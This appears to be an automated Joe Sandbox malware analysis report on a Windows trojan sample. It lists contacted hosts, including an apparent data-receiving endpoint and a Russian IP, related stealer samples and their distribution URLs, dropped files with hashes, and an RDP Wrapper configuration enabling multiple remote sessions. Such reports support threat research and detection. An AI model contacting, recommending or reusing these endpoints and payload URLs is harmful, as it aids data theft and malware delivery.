http://www.apache.org/licenses/ | RDPWInst.exe, 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmp, RDPWInst.exe.0.dr | false | - | unknown
https://github.com/lontivero/Open.Nat/issuesOAlso | hloRQZmlfg.exe, 00000000.00000002.1920702414.00000000050F0000.00000004.08000000.00040000.00000000.sdmp | false | - | unknown
http://schemas.xmlsoap.org/soap/envelope/ | hloRQZmlfg.exe, 00000000.00000002.1920702414.00000000050F0000.00000004.08000000.00040000.00000000.sdmp | false | URL Reputation: safe | unknown
https://raw.githubusercontent.com/stascorp/rdpwrap/master/res/rdpwrap.ini | RDPWInst.exe | false | - | unknown
https://hansgborn.eu/receive.phpd | hloRQZmlfg.exe, 00000000.00000002.1919966763.0000000002DD3000.00000004.00000800.00020000.00000000.sdmp | false | - | unknown
http://hansgborn.eud | hloRQZmlfg.exe, 00000000.00000002.1919966763.0000000002DD3000.00000004.00000800.00020000.00000000.sdmp | false | - | unknown
http://upx.sf.net | Amcache.hve.38.dr | false | URL Reputation: safe | unknown
http://147.45.44.104 | hloRQZmlfg.exe, 00000000.00000002.1919966763.0000000002CF1000.00000004.00000800.00020000.00000000.sdmp | false | - | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | hloRQZmlfg.exe, 00000000.00000002.1919966763.0000000002CF1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://hansgborn.eu | hloRQZmlfg.exe, 00000000.00000002.1919966763.0000000002DD3000.00000004.00000800.00020000.00000000.sdmp | false | - | unknown
http://api.ipify.org | hloRQZmlfg.exe, 00000000.00000002.1919966763.0000000002DD3000.00000004.00000800.00020000.00000000.sdmp | false | - | unknown
                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
104.26.12.205 | api.ipify.org | United States | - | 13335 | CLOUDFLARENETUS | false
239.255.255.250 | unknown | Reserved | - | unknown | unknown | false
8.46.123.33 | unknown | United States | - | 62713 | AS-PUBMATICUS | true
188.114.96.3 | hansgborn.eu | European Union | - | 13335 | CLOUDFLARENETUS | false
147.45.44.104 | unknown | Russian Federation | - | 2895 | FREE-NET-ASFREEnetEU | false
                                      Joe Sandbox version:41.0.0 Charoite
                                      Analysis ID:1528586
                                      Start date and time:2024-10-08 03:22:08 +02:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:0h 6m 50s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                      Number of analysed new started processes analysed:41
                                      Number of new started drivers analysed:3
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample name:hloRQZmlfg.exe
                                      renamed because original name is a hash value
                                      Original Sample Name:cee4e023e6afaaa51f600caec3469215.exe
                                      Detection:MAL
                                      Classification:mal100.spre.troj.evad.winEXE@38/13@2/5
                                      EGA Information:
                                      • Successful, ratio: 50%
                                      HCA Information:
                                      • Successful, ratio: 99%
                                      • Number of executed functions: 104
                                      • Number of non-executed functions: 49
                                      Cookbook Comments:
                                      • Found application associated with file extension: .exe
                                      • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                      • Excluded IPs from analysis (whitelisted): 20.189.173.21
                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus16.westus.cloudapp.azure.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                      • Execution Graph export aborted for target hloRQZmlfg.exe, PID 2444 because it is empty
                                      • Not all processes where analyzed, report is missing behavior information
                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                                      • Report size getting too big, too many NtSetInformationFile calls found.
                                      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
21:23:51 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
104.26.12.205 | file.exe | Get hash | malicious | RDPWrap Tool | Browse | api.ipify.org/
104.26.12.205 | file.exe | Get hash | malicious | Unknown | Browse | api.ipify.org/
104.26.12.205 | file.exe | Get hash | malicious | Unknown | Browse | api.ipify.org/
104.26.12.205 | file.exe | Get hash | malicious | Unknown | Browse | api.ipify.org/
104.26.12.205 | file.exe | Get hash | malicious | LummaC, PrivateLoader, Stealc, Vidar | Browse | api.ipify.org/
104.26.12.205 | Prismifyr-Install.exe | Get hash | malicious | Node Stealer | Browse | api.ipify.org/
104.26.12.205 | 2zYP8qOYmJ.exe | Get hash | malicious | Unknown | Browse | api.ipify.org/
104.26.12.205 | file.exe | Get hash | malicious | Unknown | Browse | api.ipify.org/
104.26.12.205 | file.exe | Get hash | malicious | Unknown | Browse | api.ipify.org/
104.26.12.205 | file.exe | Get hash | malicious | LummaC, RDPWrap Tool, LummaC Stealer, Vidar | Browse | api.ipify.org/
239.255.255.250 | https://starylasfe.com.de/6SZZr/ | Get hash | malicious | HTMLPhisher | Browse | -
239.255.255.250 | https://Vv.ndlevesio.com/vrbU/ | Get hash | malicious | Unknown | Browse | -
239.255.255.250 | http://hans.uniformeslaamistad.com/yuop/66e6ea133c92f_crypted.exe#xin | Get hash | malicious | PureLog Stealer, RedLine, zgRAT | Browse | -
239.255.255.250 | http://pay.christinagstewart.com/ | Get hash | malicious | Unknown | Browse | -
239.255.255.250 | http://hans.uniformeslaamistad.com/prog/66ce237125ba7_vjrew2ge.exe | Get hash | malicious | Unknown | Browse | -
239.255.255.250 | Audio_Msg..00293614554893Transcript.html | Get hash | malicious | Unknown | Browse | -
239.255.255.250 | http://hans.uniformeslaamistad.com/prog/66f5db9e54794_vfkagks.exe | Get hash | malicious | Unknown | Browse | -
239.255.255.250 | http://xdr.euw31usea1-carbonhelixbytedandomaincontrolpanele-for-github.sentinelone.net/ | Get hash | malicious | Unknown | Browse | -
239.255.255.250 | file.exe | Get hash | malicious | Credential Flusher | Browse | -
239.255.255.250 | RemittanceDetails(Rjackson)CQDM.html | Get hash | malicious | HTMLPhisher | Browse | -
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
api.ipify.org | Ref#0503711.exe | Get hash | malicious | AgentTesla | Browse | 172.67.74.152
api.ipify.org | 8ID0109FLT24PO92CD-R.pdf | Get hash | malicious | HTMLPhisher | Browse | 104.26.12.205
api.ipify.org | shipping.exe | Get hash | malicious | AgentTesla | Browse | 172.67.74.152
api.ipify.org | QUOTATIONS#08673.exe | Get hash | malicious | AgentTesla | Browse | 172.67.74.152
api.ipify.org | MAVI VATAN - VSL's DETAILS.docx.exe | Get hash | malicious | AgentTesla, PureLog Stealer | Browse | 104.26.12.205
api.ipify.org | http://pub-6abf9f4f2e414af1a92f1d0cac9c1674.r2.dev/auth_gen.html | Get hash | malicious | Unknown | Browse | 172.67.74.152
api.ipify.org | New order.exe | Get hash | malicious | AgentTesla | Browse | 104.26.12.205
api.ipify.org | http://netflix.dittmedlemskap.com/ | Get hash | malicious | Unknown | Browse | 172.67.74.152
api.ipify.org | DHL_Shipment_Details_8th_October.pdf.exe | Get hash | malicious | AgentTesla | Browse | 104.26.13.205
api.ipify.org | http://duttweilerangel6891-sidebarg165895-flarew256.pages.dev/help/contact/656749019228815 | Get hash | malicious | HTMLPhisher | Browse | 172.67.74.152
hansgborn.eu | file.exe | Get hash | malicious | RDPWrap Tool | Browse | 188.114.97.3
hansgborn.eu | file.exe | Get hash | malicious | RDPWrap Tool | Browse | 188.114.97.3
hansgborn.eu | file.exe | Get hash | malicious | RDPWrap Tool | Browse | 188.114.97.3
hansgborn.eu | file.exe | Get hash | malicious | LummaC, RDPWrap Tool, LummaC Stealer, Vidar | Browse | 188.114.97.3
hansgborn.eu | file.exe | Get hash | malicious | LummaC, RDPWrap Tool, LummaC Stealer, Vidar | Browse | 188.114.96.3
hansgborn.eu | file.exe | Get hash | malicious | LummaC, RDPWrap Tool, LummaC Stealer, Stealc, Vidar | Browse | 188.114.97.3
hansgborn.eu | file.exe | Get hash | malicious | LummaC, RDPWrap Tool, LummaC Stealer, Vidar | Browse | 188.114.96.3
hansgborn.eu | file.exe | Get hash | malicious | LummaC, RDPWrap Tool, LummaC Stealer, Vidar | Browse | 188.114.96.3
hansgborn.eu | file.exe | Get hash | malicious | LummaC, RDPWrap Tool, LummaC Stealer, Vidar | Browse | 188.114.96.3
hansgborn.eu | file.exe | Get hash | malicious | LummaC, RDPWrap Tool, LummaC Stealer, Vidar | Browse | 188.114.97.3
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
CLOUDFLARENETUS | file.exe | Get hash | malicious | LummaC | Browse | 172.67.206.204
CLOUDFLARENETUS | https://starylasfe.com.de/6SZZr/ | Get hash | malicious | HTMLPhisher | Browse | 104.17.25.14
CLOUDFLARENETUS | 2ngxhElaud.exe | Get hash | malicious | Xmrig | Browse | 172.67.173.168
CLOUDFLARENETUS | copyright_infringement_evidence_1.exe | Get hash | malicious | Unknown | Browse | 172.67.158.129
CLOUDFLARENETUS | file.exe | Get hash | malicious | LummaC | Browse | 172.67.206.204
CLOUDFLARENETUS | Copyright_Infringement_Evidence.exe | Get hash | malicious | Unknown | Browse | 172.67.158.129
CLOUDFLARENETUS | ArT23Ix6Ox.exe | Get hash | malicious | Unknown | Browse | 172.67.159.186
CLOUDFLARENETUS | cqKYl7T4CR.exe | Get hash | malicious | Unknown | Browse | 104.21.9.92
CLOUDFLARENETUS | ArT23Ix6Ox.exe | Get hash | malicious | Unknown | Browse | 104.21.9.92
CLOUDFLARENETUS | cqKYl7T4CR.exe | Get hash | malicious | Unknown | Browse | 172.67.159.186
FREE-NET-ASFREEnetEU | T2bmenoX1o.exe | Get hash | malicious | LummaC, Vidar | Browse | 147.45.44.104
FREE-NET-ASFREEnetEU | http://hans.uniformeslaamistad.com/yuop/66e6ea133c92f_crypted.exe#xin | Get hash | malicious | PureLog Stealer, RedLine, zgRAT | Browse | 147.45.44.104
FREE-NET-ASFREEnetEU | http://hans.uniformeslaamistad.com/prog/66ce237125ba7_vjrew2ge.exe | Get hash | malicious | Unknown | Browse | 147.45.44.104
FREE-NET-ASFREEnetEU | http://hans.uniformeslaamistad.com/prog/66f5db9e54794_vfkagks.exe | Get hash | malicious | Unknown | Browse | 147.45.44.104
FREE-NET-ASFREEnetEU | T8TY28UxiT.dll | Get hash | malicious | Unknown | Browse | 147.45.116.5
FREE-NET-ASFREEnetEU | T8TY28UxiT.dll | Get hash | malicious | Unknown | Browse | 147.45.116.5
FREE-NET-ASFREEnetEU | Q0cWJo6Jvh.exe | Get hash | malicious | Unknown | Browse | 147.45.116.5
FREE-NET-ASFREEnetEU | Q0cWJo6Jvh.exe | Get hash | malicious | Unknown | Browse | 147.45.116.5
FREE-NET-ASFREEnetEU | lihZ6gUU7V.exe | Get hash | malicious | LummaC, Stealc, Vidar | Browse | 147.45.44.104
FREE-NET-ASFREEnetEU | Bn7LPdQA1s.exe | Get hash | malicious | LummaC, Vidar | Browse | 147.45.44.104
CLOUDFLARENETUS | file.exe | Get hash | malicious | LummaC | Browse | 172.67.206.204
CLOUDFLARENETUS | https://starylasfe.com.de/6SZZr/ | Get hash | malicious | HTMLPhisher | Browse | 104.17.25.14
CLOUDFLARENETUS | 2ngxhElaud.exe | Get hash | malicious | Xmrig | Browse | 172.67.173.168
CLOUDFLARENETUS | copyright_infringement_evidence_1.exe | Get hash | malicious | Unknown | Browse | 172.67.158.129
CLOUDFLARENETUS | file.exe | Get hash | malicious | LummaC | Browse | 172.67.206.204
CLOUDFLARENETUS | Copyright_Infringement_Evidence.exe | Get hash | malicious | Unknown | Browse | 172.67.158.129
CLOUDFLARENETUS | ArT23Ix6Ox.exe | Get hash | malicious | Unknown | Browse | 172.67.159.186
CLOUDFLARENETUS | cqKYl7T4CR.exe | Get hash | malicious | Unknown | Browse | 104.21.9.92
CLOUDFLARENETUS | ArT23Ix6Ox.exe | Get hash | malicious | Unknown | Browse | 104.21.9.92
CLOUDFLARENETUS | cqKYl7T4CR.exe | Get hash | malicious | Unknown | Browse | 172.67.159.186
AS-PUBMATICUS | DocuSign-Docx.pdf | Get hash | malicious | Unknown | Browse | 185.64.189.112
AS-PUBMATICUS | https://issuu.com/smart_media/docs/die_welt_wirtschaft/19 | Get hash | malicious | Unknown | Browse | 198.47.127.18
AS-PUBMATICUS | https://coisunibaseaiusignin.gitbook.io/ | Get hash | malicious | HTMLPhisher | Browse | 185.64.191.210
AS-PUBMATICUS | http://uppholldbcloginn.gitbook.io/us/ | Get hash | malicious | HTMLPhisher | Browse | 198.47.127.205
AS-PUBMATICUS | http://geminislogins.gitbook.io/us/ | Get hash | malicious | HTMLPhisher | Browse | 185.64.191.210
AS-PUBMATICUS | Farahexperiences.com_Report_52288.pdf | Get hash | malicious | Unknown | Browse | 185.64.189.112
AS-PUBMATICUS | http://emaildlatt-mailcom-28e2uy93.weeblysite.com/ | Get hash | malicious | HTMLPhisher | Browse | 198.47.127.18
AS-PUBMATICUS | http://coinbassewalletextensin.gitbook.io/us | Get hash | malicious | Unknown | Browse | 185.64.191.210
AS-PUBMATICUS | https://metamaseiklogin.gitbook.io/ | Get hash | malicious | HTMLPhisher | Browse | 185.64.191.210
AS-PUBMATICUS | https://mmetmask-login.gitbook.io/ | Get hash | malicious | HTMLPhisher | Browse | 185.64.191.210
Columns: Match | Associated Sample Name / URL | Detection | Threat Name | Context
Match: 3b5074b1b5d032e5620f69f9f700ff0e
• Sample: 2ngxhElaud.exe, Detection: malicious, Threat Name: Xmrig, Context: 188.114.96.3
• Sample: https://Vv.ndlevesio.com/vrbU/, Detection: malicious, Threat Name: Unknown, Context: 188.114.96.3
• Sample: x2Yi9Hr77a.exe, Detection: malicious, Threat Name: XWorm, Context: 188.114.96.3
• Sample: file.exe, Detection: malicious, Threat Name: Xmrig, Context: 188.114.96.3
• Sample: http://hans.uniformeslaamistad.com/prog/66f5db9e54794_vfkagks.exe, Detection: malicious, Threat Name: Unknown, Context: 188.114.96.3
• Sample: STlUEqhwpx.exe, Detection: malicious, Threat Name: Quasar, Context: 188.114.96.3
• Sample: EUYIlr7uUX.exe, Detection: malicious, Threat Name: Snake Keylogger, VIP Keylogger, Context: 188.114.96.3
• Sample: file.exe, Detection: malicious, Threat Name: Credential Flusher, Context: 188.114.96.3
• Sample: T6l6gPxwQU.exe, Detection: malicious, Threat Name: Unknown, Context: 188.114.96.3
• Sample: https://mailstat.us/tr/t/5w8u1qwlwl61e4h/1/https:/krediti.ca/#Y2FyYS5jJGNiZmxvb3JzaW5jLmNvbQ==, Detection: malicious, Threat Name: Outlook Phishing, HTMLPhisher, Context: 188.114.96.3
Columns: Match | Associated Sample Name / URL | Detection | Threat Name | Context
Match: C:\Program Files\RDP Wrapper\rdpwrap.dll
• Sample: file.exe, Detection: malicious, Threat Name: RDPWrap Tool
• Sample: file.exe, Detection: malicious, Threat Name: RDPWrap Tool
• Sample: file.exe, Detection: malicious, Threat Name: RDPWrap Tool
• Sample: file.exe, Detection: malicious, Threat Name: LummaC, RDPWrap Tool, LummaC Stealer, Vidar
• Sample: file.exe, Detection: malicious, Threat Name: LummaC, RDPWrap Tool, LummaC Stealer, Vidar
• Sample: file.exe, Detection: malicious, Threat Name: LummaC, RDPWrap Tool, LummaC Stealer, Stealc, Vidar
• Sample: file.exe, Detection: malicious, Threat Name: LummaC, RDPWrap Tool, LummaC Stealer, Vidar
• Sample: file.exe, Detection: malicious, Threat Name: LummaC, RDPWrap Tool, LummaC Stealer, Vidar
• Sample: file.exe, Detection: malicious, Threat Name: LummaC, RDPWrap Tool, LummaC Stealer, Vidar
• Sample: file.exe, Detection: malicious, Threat Name: LummaC, RDPWrap Tool, LummaC Stealer, Vidar
                                                                              Process:C:\Users\user\AppData\Local\Temp\RDPWInst.exe
                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):116736
                                                                              Entropy (8bit):5.884975745255681
                                                                              Encrypted:false
                                                                              SSDEEP:3072:m3zxbyHM+TstVfFyov7je9LBMMmMJDOvYYVs:oMjTiVw2ve9LBMMpJsT
                                                                              MD5:461ADE40B800AE80A40985594E1AC236
                                                                              SHA1:B3892EEF846C044A2B0785D54A432B3E93A968C8
                                                                              SHA-256:798AF20DB39280F90A1D35F2AC2C1D62124D1F5218A2A0FA29D87A13340BD3E4
                                                                              SHA-512:421F9060C4B61FA6F4074508602A2639209032FD5DF5BFC702A159E3BAD5479684CCB3F6E02F3E38FB8DB53839CF3F41FE58A3ACAD6EC1199A48DC333B2D8A26
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 54%
                                                                              • Antivirus: Virustotal, Detection: 57%, Browse
                                                                              Joe Sandbox View:
                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........N.rB/.!B/.!B/.!.~.!j/.!.~.!&/.!.~3!H/.!..'!G/.!B/.!./.!O}.!F/.!O}0!C/.!O}7!C/.!O}2!C/.!RichB/.!................PE..d...Z..T.........." .................Q....................................... ............`.........................................0...l.......<...................................................................`...p............ ...............................text............................... ..`.rdata..<.... ......................@..@.data....=..........................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................
                                                                              Process:C:\Users\user\AppData\Local\Temp\RDPWInst.exe
                                                                              File Type:Generic INItialization configuration [SLPolicy]
                                                                              Category:dropped
                                                                              Size (bytes):443552
                                                                              Entropy (8bit):5.4496544667416975
                                                                              Encrypted:false
                                                                              SSDEEP:768:DUoDQVQpXQq4WDi9SUnpB8fbQnxJcy8RMFdKKb8x8Rr/d6gl/+f8jZ0ftlFn4m7Y:TJGYS33L+MUIiG4IvREWddadl/Fy/k9c
                                                                              MD5:92BC5FEDB559357AA69D516A628F45DC
                                                                              SHA1:6468A9FA0271724E70243EAB49D200F457D3D554
                                                                              SHA-256:85CD5CD634FA8BBBF8D71B0A7D49A58870EF760DA6D6E7789452CAE4CAB28127
                                                                              SHA-512:87E210E22631C1A394918859213140A7C54B75AEC9BBC4F44509959D15CFA14ABCBFEB1ADF9CFFA11B2E88F84A8708F67E842D859E63394B7F6036CE934C3CC9
                                                                              Malicious:false
                                                                              Preview:; RDP Wrapper Library configuration..; Do not modify without special knowledge..; Edited by sebaxakerhtc....[Main]..Updated=2024-09-25..LogFile=\rdpwrap.txt..SLPolicyHookNT60=1..SLPolicyHookNT61=1....[SLPolicy]..TerminalServices-RemoteConnectionManager-AllowRemoteConnections=1..TerminalServices-RemoteConnectionManager-AllowMultipleSessions=1..TerminalServices-RemoteConnectionManager-AllowAppServerMode=1..TerminalServices-RemoteConnectionManager-AllowMultimon=1..TerminalServices-RemoteConnectionManager-MaxUserSessions=0..TerminalServices-RemoteConnectionManager-ce0ad219-4670-4988-98fb-89b14c2f072b-MaxSessions=0..TerminalServices-RemoteConnectionManager-45344fe7-00e6-4ac6-9f01-d01fd4ffadfb-MaxSessions=2..TerminalServices-RDP-7-Advanced-Compression-Allowed=1..TerminalServices-RemoteConnectionManager-45344fe7-00e6-4ac6-9f01-d01fd4ffadfb-LocalOnly=0..TerminalServices-RemoteConnectionManager-8dc86f1d-9969-4379-91c1-06fe1dc60575-MaxSessions=1000..TerminalServices-DeviceRedirection-Licenses-TS
                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):65536
                                                                              Entropy (8bit):1.3840373093637786
                                                                              Encrypted:false
                                                                              SSDEEP:192:Dr0fZbf0BU/KaGwOpsMLmdzuiFYZ24IO8S:/0fZwBU/KaySMSdzuiFYY4IO8S
                                                                              MD5:C557E311E2DE95A575477C498BA9AD12
                                                                              SHA1:8942E4F3747DC39DB0959D5AFD1252F87877C1A8
                                                                              SHA-256:2E924038991D81C873776C3A9C6DAB5FD94EA3D60E24415C63271CAE6196C3EE
                                                                              SHA-512:796FCC9E32B37166AE92B17FC710CEFD418B2218949B0FF9373E8D0714F3DE4448332BD3B6114CF955F9F8AF74EE6FAEB93ADB317D4E368E1DFB05166D01D3AB
                                                                              Malicious:true
                                                                              Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.8.2.4.2.2.3.9.1.1.3.0.8.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.2.8.2.4.2.2.5.2.0.8.1.8.4.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.9.4.0.9.a.0.e.-.f.3.a.d.-.4.6.0.6.-.a.c.e.c.-.2.9.7.0.4.e.d.3.c.8.1.2.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.b.9.5.2.6.c.0.-.f.9.b.0.-.4.4.d.5.-.b.7.f.b.-.1.e.e.1.f.6.8.7.7.3.e.8.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.h.l.o.R.Q.Z.m.l.f.g...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.D.P.C.r.e.a.t.o.r...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.9.8.c.-.0.0.0.1.-.0.0.1.4.-.b.f.0.4.-.0.9.9.e.2.0.1.9.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.2.a.5.d.9.2.d.4.1.7.9.1.6.5.b.c.0.8.1.7.f.d.a.7.2.e.7.5.7.5.b.c.0.0.0.0.0.0.0.0.!.0.0.0.0.b.f.2.c.e.f.f.1.f.1.9.f.0.9.a.7.0.8.6.3.d.1.f.8.c.7.b.e.0.f.a.9.6.6.
                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                              File Type:Mini DuMP crash report, 15 streams, Tue Oct 8 01:23:44 2024, 0x1205a4 type
                                                                              Category:dropped
                                                                              Size (bytes):385976
                                                                              Entropy (8bit):3.362067021584867
                                                                              Encrypted:false
                                                                              SSDEEP:6144:RebYc4AyUsSrjTgTyrGuVwm0j/TknLIe:RiYIQSrjTmuVwrj/Tkn8e
                                                                              MD5:0A6687B45E85F7A0CDCE28AB7018ADEB
                                                                              SHA1:BD857779DEE2B40E4D6ECDE60A08E4650455F9B8
                                                                              SHA-256:FC484CA4F873C983E2A2EB280D1F50CE29CF609EEBEFEB261BEEC22B0EAD4B9C
                                                                              SHA-512:5B063E6AED2B9BB004461797CD30EE54287E7417526E1845C3E0E9FD6021C2A9285129377225784B9852ACE44A46768E1E4280264E5B621102A9D268BE0A8FD7
                                                                              Malicious:false
                                                                              Preview:MDMP..a..... ..........g........................\)..........<....4......................`.......8...........T............k..(x..........05...........7..............................................................................eJ.......7......GenuineIntel............T...........u..g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):8402
                                                                              Entropy (8bit):3.6922068753529245
                                                                              Encrypted:false
                                                                              SSDEEP:192:R6l7wVeJlP6k+Y6YSISU9kdgmfZTuprH89bXUsf59m:R6lXJ96kR6YtSU9kdgmf9DXHfq
                                                                              MD5:2C0BCCD2941556161A66FF1C6E08DD58
                                                                              SHA1:3CC4BED02D8B5D8B207AACCBBEBA68523A1FD520
                                                                              SHA-256:96E2E52D23EC84EBAE80BD5A0CD406162130687899D9708708DAF7150FCCA945
                                                                              SHA-512:D63C69479B741FBC1E593B53665AE9B05AA897994942BCA0C78720C1D1C553C40766FD2E16A86A9BA9F65E52D0CD01524FCA695D51F7A9C13BBF7AC462B54C29
                                                                              Malicious:false
                                                                              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.4.4.4.<./.P.i.
                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):4749
                                                                              Entropy (8bit):4.4710602476547665
                                                                              Encrypted:false
                                                                              SSDEEP:48:cvIwWl8zsmJg77aI9IbWpW8VYhYm8M4JTu3FTg+q8vhuT10/WiXd:uIjf8I7Sq7VZJxKu10/ZXd
                                                                              MD5:3E6317D8E4B0B87DB73DE3C52437BEFB
                                                                              SHA1:CE0B76533BBE3613DA1EA5383057CBEE40CE631B
                                                                              SHA-256:518EB8F48B09A51E15C54BD91B9F5AC53DC49292070EA9990CD29DBB13223D12
                                                                              SHA-512:CDDC2F7AEF96DC10F8B23EF76590A7FEB7598C7C098C1E77EE99F06617EA027B8864DEB2E2AB9C40BCDBAB9894C038BE45E89FE829241FBC3D107B742A1B066F
                                                                              Malicious:false
                                                                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="533786" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                              Process:C:\Users\user\Desktop\hloRQZmlfg.exe
                                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                              Category:modified
                                                                              Size (bytes):1785344
                                                                              Entropy (8bit):6.646511331349125
                                                                              Encrypted:false
                                                                              SSDEEP:24576:+rKxoVT2iXc+IZP+6WiaTAsN/3ebTvK+63CWH8iA/iD2hgPjcC8SVdKumYr7:vHZGpdqYH8ia6GcKuR7
